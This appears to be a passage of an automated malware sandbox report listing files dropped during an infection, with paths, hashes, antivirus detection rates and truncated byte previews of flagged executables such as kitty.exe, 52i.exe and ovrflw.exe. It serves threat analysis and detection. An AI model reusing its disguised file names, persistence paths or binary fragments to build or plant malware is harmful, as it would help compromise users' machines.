Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\IIZS2TRqf69aZbLAX3cf3edn.exe.log

Download File

Process:	C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	838
Entropy (8bit):	5.356471432431617
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhRAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oRAHKKkhHNpv
MD5:	E56A6A79CB531084A51F12C271BE7439
SHA1:	97A016CBE4C221936BAB8F76D33F7C021AA19ADF
SHA-256:	FA63B35C53D1B58B86D8C3CB3976AF7B7C096FD787EF1D33F63F5A31C87BC3E3
SHA-512:	B090CA13606574646D98D7B6F0FD5B16A7A6471FDC4F3CECDCFDDCC23925F97A3F0F5EEF3ECBE81A29B769FE7BCFF88DA0950FFD9A8D0FD2804F36171DE31D7A
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TypeId.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Guid\TypeId.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	838
Entropy (8bit):	5.356471432431617
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhRAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oRAHKKkhHNpv
MD5:	E56A6A79CB531084A51F12C271BE7439
SHA1:	97A016CBE4C221936BAB8F76D33F7C021AA19ADF
SHA-256:	FA63B35C53D1B58B86D8C3CB3976AF7B7C096FD787EF1D33F63F5A31C87BC3E3
SHA-512:	B090CA13606574646D98D7B6F0FD5B16A7A6471FDC4F3CECDCFDDCC23925F97A3F0F5EEF3ECBE81A29B769FE7BCFF88DA0950FFD9A8D0FD2804F36171DE31D7A
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Windows.exe.log

Download File

Process:	C:\Users\user\Windows.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ix4A2DreBBsQwY6YHkidcDjo.exe.log

Download File

Process:	C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\mswabnet.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.355760272568367
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2FDkwIyp1v:Q3La/KDLI4MWuPXcp1v
MD5:	FC3575D5BE1A5405683DC33B66D36243
SHA1:	1C816D34B7D5B96E077DC3EF640BA8C7BA370502
SHA-256:	1D7F7FBA862417A1D0351C1BF454F1A9BB0ED7FFD5DF1112EED802C01BDDA50C
SHA-512:	68914FE00F8550A623074F9ACC31ACEF8A3F6DFDDBD9FDA23512079BEC5E8A4D4E82BC8CD8D536E6C88F4DA3A704AC376785B44343BD3BED83E440857A3C0164
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xzzrvckwuia.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\52i[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	732672
Entropy (8bit):	7.951474723644558
Encrypted:	false
SSDEEP:	12288:LNtiEVOD9lCMlex5aMHGj4CNO+y6uY7FogRt+KiW6G0YoYEZe9l:5tP29Tex5aPj/zyKogRcKiW4KEs
MD5:	4D190C235680B3E4481E4D7685E9A118
SHA1:	17C5654E4077F9E0DD8E17E92E36696BED55557A
SHA-256:	4083F1EA732FD45ABE2F648F824BE39E3E511A59179FA7C8349D7F7F75E3D3B4
SHA-512:	517807DD7345C926CFC2E58D883764368C723900871AB358949A09BB6B23DCAEF1A8DB8096EBB2DF08112E6914F893CDCC0B5FA8B78BC70008390598353BA771
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79% Antivirus: Virustotal, Detection: 62%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....................0..&............... ....@...... ....................................`...@......@............... ...............................`..`............................................................................................ ..H............text....$... ...&.................. ..`.rsrc...`....`.......(..............@..@........................................H.......4....X..........@...................................................(.......(....*.0..........(......8....... ....o....8........o......o....o......82..... A..{ ....b .X..a~....{....a(+...(....o....8....s......8,..... ..gh ....a~....{....a(+...(....o....8z....s......8..... .?.......%.....(....s......8..........s......8.........o....8......o....s......8.............8.......s......8 ......(......8..........o....&8.........o....8>....+...( ..... ..f -..za~....{C...a(+...(!...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ovrflw[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1422336
Entropy (8bit):	7.324214382355643
Encrypted:	false
SSDEEP:	24576:XF1ci4Lmy1ZBk0arIT4+hmmnPgM7jixqS8fWW9MVWCmx:X3ci4LB1ZW0p4+hmIPgM7wV5mx
MD5:	3ADFC7CF1E296C6FB703991C5233721D
SHA1:	FDDD2877CE7952B91C3F841CA353235D6D8EEA67
SHA-256:	6BC23179D079D220337EDE270113D4A474B549F5F0C7FD57F3D33D318F7AE471
SHA-512:	5136525626C3021BAF8D35BE0D76473CC03BFE2433682D613650B8E4BB444F767D2D14AC0070CE46C4C220E0A71A8F2E789E4E684E2042BD78B60F68F35A652B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 41%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....x................0.................. ........@.. ....................... ............@.................................`...K.......H............................................................................ ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc..............................@..B........................H........>.........0.......................................................:...r.....e..<.(.......^.a%WCE.x.......hD"....6........Q..g...)...~...J....S...2....G.9Y%...`.a.g1K.Z..2}....0.J...h........<;...!...m.A....K.D\|...C-IP(...E.v.#.a$.T..]~$..G.M..,e.........l.\P"d#...`..3.. .......g.......;..^.m..wav...E...,~.gZ...C.......................................................................................\\........x.J....J.x....................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\kitty[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	327168
Entropy (8bit):	6.641160964790137
Encrypted:	false
SSDEEP:	6144:nx9ooeWfqpO3HS0f+KIXDyqR9NKtU5tyt7EJtdb/yw0cV3IOfe52GGZ2OGe+CKip:nx9onKM2+KIXrLGw0ci22OGe+CKiV9pz
MD5:	0EC1F7CC17B6402CD2DF150E0E5E92CA
SHA1:	8405B9BF28ACCB6F1907FBE28D2536DA4FBA9FC9
SHA-256:	4C5CA5701285337A96298EBF994F8BA013D290C63AFA65B5C2B05771FBBB9ED4
SHA-512:	7CAA2416BC7878493B62A184DDC844D201A9AB5282ABFA77A616316AF39FF65309E37BB566B3E29D9E764E08F4EDA43A06464ACAF9962F911B33E6DBC60C1861
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96% Antivirus: Virustotal, Detection: 86%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............k...k...k.......k......hk.......k.......k......k......k.....k.......k...k..\|k.......k.......k..Rich.k..................PE..L....G.f.....................R......K.............@..........................@............@.................................4....................................)......8..............................@............................................text.............................. ..`.rdata..............................@..@.data...."..........................@....reloc...).......*..................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	19253
Entropy (8bit):	5.005753878328145
Encrypted:	false
SSDEEP:	384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
MD5:	81D32E8AE893770C4DEA5135D1D8E78D
SHA1:	CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
SHA-256:	6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
SHA-512:	FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulpgztZ:NllUO
MD5:	ADB67D140C904AFBF0D2C47FCFC73086
SHA1:	CAA1973FC7AB5367DC2007487049041C6D0AC54E
SHA-256:	BA09CC360CD10629A32D8E84392BAD452284123893B0792F6417340A72E3B951
SHA-512:	85BE6449222EAA096A6F84E051D16DB1147498DA621BDB6C7B5D11CF6C306DB4DE90CEB457EDE22CCA53BC94CF4D1E6D0FAE203D196AF7AF225AF87464E1286E
Malicious:	false
Reputation:	unknown
Preview:	@...e.................................x..............@..........

C:\Users\user\AppData\Local\Temp\1000267001\52i.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	732672
Entropy (8bit):	7.951474723644558
Encrypted:	false
SSDEEP:	12288:LNtiEVOD9lCMlex5aMHGj4CNO+y6uY7FogRt+KiW6G0YoYEZe9l:5tP29Tex5aPj/zyKogRcKiW4KEs
MD5:	4D190C235680B3E4481E4D7685E9A118
SHA1:	17C5654E4077F9E0DD8E17E92E36696BED55557A
SHA-256:	4083F1EA732FD45ABE2F648F824BE39E3E511A59179FA7C8349D7F7F75E3D3B4
SHA-512:	517807DD7345C926CFC2E58D883764368C723900871AB358949A09BB6B23DCAEF1A8DB8096EBB2DF08112E6914F893CDCC0B5FA8B78BC70008390598353BA771
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79% Antivirus: Virustotal, Detection: 62%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....................0..&............... ....@...... ....................................`...@......@............... ...............................`..`............................................................................................ ..H............text....$... ...&.................. ..`.rsrc...`....`.......(..............@..@........................................H.......4....X..........@...................................................(.......(....*.0..........(......8....... ....o....8........o......o....o......82..... A..{ ....b .X..a~....{....a(+...(....o....8....s......8,..... ..gh ....a~....{....a(+...(....o....8z....s......8..... .?.......%.....(....s......8..........s......8.........o....8......o....s......8.............8.......s......8 ......(......8..........o....&8.........o....8>....+...( ..... ..f -..za~....{C...a(+...(!...

C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	327168
Entropy (8bit):	6.641160964790137
Encrypted:	false
SSDEEP:	6144:nx9ooeWfqpO3HS0f+KIXDyqR9NKtU5tyt7EJtdb/yw0cV3IOfe52GGZ2OGe+CKip:nx9onKM2+KIXrLGw0ci22OGe+CKiV9pz
MD5:	0EC1F7CC17B6402CD2DF150E0E5E92CA
SHA1:	8405B9BF28ACCB6F1907FBE28D2536DA4FBA9FC9
SHA-256:	4C5CA5701285337A96298EBF994F8BA013D290C63AFA65B5C2B05771FBBB9ED4
SHA-512:	7CAA2416BC7878493B62A184DDC844D201A9AB5282ABFA77A616316AF39FF65309E37BB566B3E29D9E764E08F4EDA43A06464ACAF9962F911B33E6DBC60C1861
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96% Antivirus: Virustotal, Detection: 86%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............k...k...k.......k......hk.......k.......k......k......k.....k.......k...k..\|k.......k.......k..Rich.k..................PE..L....G.f.....................R......K.............@..........................@............@.................................4....................................)......8..............................@............................................text.............................. ..`.rdata..............................@..@.data...."..........................@....reloc...).......*..................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000271001\loli.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, ASCII text, with very long lines (5395)
Category:	dropped
Size (bytes):	6609
Entropy (8bit):	5.249179673762449
Encrypted:	false
SSDEEP:	96:k2J/SNi/FLQVTLKCGWz5ln59Jy0jRdoMVZTdI5:k2pV2RKCxDnxyTMVZT0
MD5:	307DCA9C775906B8DE45869CABE98FCD
SHA1:	2B80C3A2FD4A235B2CC9F89315A554D0721C0DD1
SHA-256:	8437BD0EF46A19C9A7C294C53E0429B40E76EBBD5FE9FD73A9025752495DDB1C
SHA-512:	80C03F7ADD3A33A5DF7B1F1665253283550DAC484D26339ECD85672FB506DCE44BD0BF96275D5C41A2E7369C3B604DE377B7F5985D7D0D76C7AC663D60A67A1C
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. <title>Not Found</title>.. Fonts -->. <link rel="preconnect" href="https://fonts.gstatic.com">. <link href="https://fonts.googleapis.com/css2?family=Nunito&display=swap" rel="stylesheet">.. <style>. /! normalize.css v8.0.1 \| MIT License \| github.com/necolas/normalize.css /html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;line-height:1.5}*,:after,:before{box-sizing:border-box;border:0 solid #e2e8f0}a{color:inherit;text-decoration:inherit}code{font-family:Menlo,Monaco,Consolas,Liberatio

C:\Users\user\AppData\Local\Temp\1000272001\googleupdats.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, ASCII text, with very long lines (5395)
Category:	dropped
Size (bytes):	6609
Entropy (8bit):	5.249179673762449
Encrypted:	false
SSDEEP:	96:k2J/SNi/FLQVTLKCGWz5ln59Jy0jRdoMVZTdI5:k2pV2RKCxDnxyTMVZT0
MD5:	307DCA9C775906B8DE45869CABE98FCD
SHA1:	2B80C3A2FD4A235B2CC9F89315A554D0721C0DD1
SHA-256:	8437BD0EF46A19C9A7C294C53E0429B40E76EBBD5FE9FD73A9025752495DDB1C
SHA-512:	80C03F7ADD3A33A5DF7B1F1665253283550DAC484D26339ECD85672FB506DCE44BD0BF96275D5C41A2E7369C3B604DE377B7F5985D7D0D76C7AC663D60A67A1C
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. <title>Not Found</title>.. Fonts -->. <link rel="preconnect" href="https://fonts.gstatic.com">. <link href="https://fonts.googleapis.com/css2?family=Nunito&display=swap" rel="stylesheet">.. <style>. /! normalize.css v8.0.1 \| MIT License \| github.com/necolas/normalize.css /html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;line-height:1.5}*,:after,:before{box-sizing:border-box;border:0 solid #e2e8f0}a{color:inherit;text-decoration:inherit}code{font-family:Menlo,Monaco,Consolas,Liberatio

C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1422336
Entropy (8bit):	7.324214382355643
Encrypted:	false
SSDEEP:	24576:XF1ci4Lmy1ZBk0arIT4+hmmnPgM7jixqS8fWW9MVWCmx:X3ci4LB1ZW0p4+hmIPgM7wV5mx
MD5:	3ADFC7CF1E296C6FB703991C5233721D
SHA1:	FDDD2877CE7952B91C3F841CA353235D6D8EEA67
SHA-256:	6BC23179D079D220337EDE270113D4A474B549F5F0C7FD57F3D33D318F7AE471
SHA-512:	5136525626C3021BAF8D35BE0D76473CC03BFE2433682D613650B8E4BB444F767D2D14AC0070CE46C4C220E0A71A8F2E789E4E684E2042BD78B60F68F35A652B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 41%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....x................0.................. ........@.. ....................... ............@.................................`...K.......H............................................................................ ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc..............................@..B........................H........>.........0.......................................................:...r.....e..<.(.......^.a%WCE.x.......hD"....6........Q..g...)...~...J....S...2....G.9Y%...`.a.g1K.Z..2}....0.J...h........<;...!...m.A....K.D\|...C-IP(...E.v.#.a$.T..]~$..G.M..,e.........l.\P"d#...`..3.. .......g.......;..^.m..wav...E...,~.gZ...C.......................................................................................\\........x.J....J.x....................................

C:\Users\user\AppData\Local\Temp\246122658369

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	100615
Entropy (8bit):	7.868558836002745
Encrypted:	false
SSDEEP:	3072:N08ja35EoZgtOW8PzOH/ajYZp10KI9fbtTNTAwyXDN1g:OkPtOWAqaEZrAFtTN8DXg
MD5:	838442A11099856B4698EF672888AA43
SHA1:	1EB4913F118B0E5E08A37BCD7C6BE06CB179B427
SHA-256:	EECC324C58E7B71EF3104A51123203E63830AED95C88326BECB9E2870777D077
SHA-512:	BD99C5F80A62D32A04452723142A27C157C2AFEBA95C6029235A80597864812250AE13A81647F1C300F027D8C5AAA3A2F34167E199A77A812F9BF423DFFBC6E3
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-w....h.\_.... o1...Ob=Mr..K..6......X...]..p4W...........y?..?........<..Uy..t.......W.....u...gm&.f....

C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	327168
Entropy (8bit):	6.641160964790137
Encrypted:	false
SSDEEP:	6144:nx9ooeWfqpO3HS0f+KIXDyqR9NKtU5tyt7EJtdb/yw0cV3IOfe52GGZ2OGe+CKip:nx9onKM2+KIXrLGw0ci22OGe+CKiV9pz
MD5:	0EC1F7CC17B6402CD2DF150E0E5E92CA
SHA1:	8405B9BF28ACCB6F1907FBE28D2536DA4FBA9FC9
SHA-256:	4C5CA5701285337A96298EBF994F8BA013D290C63AFA65B5C2B05771FBBB9ED4
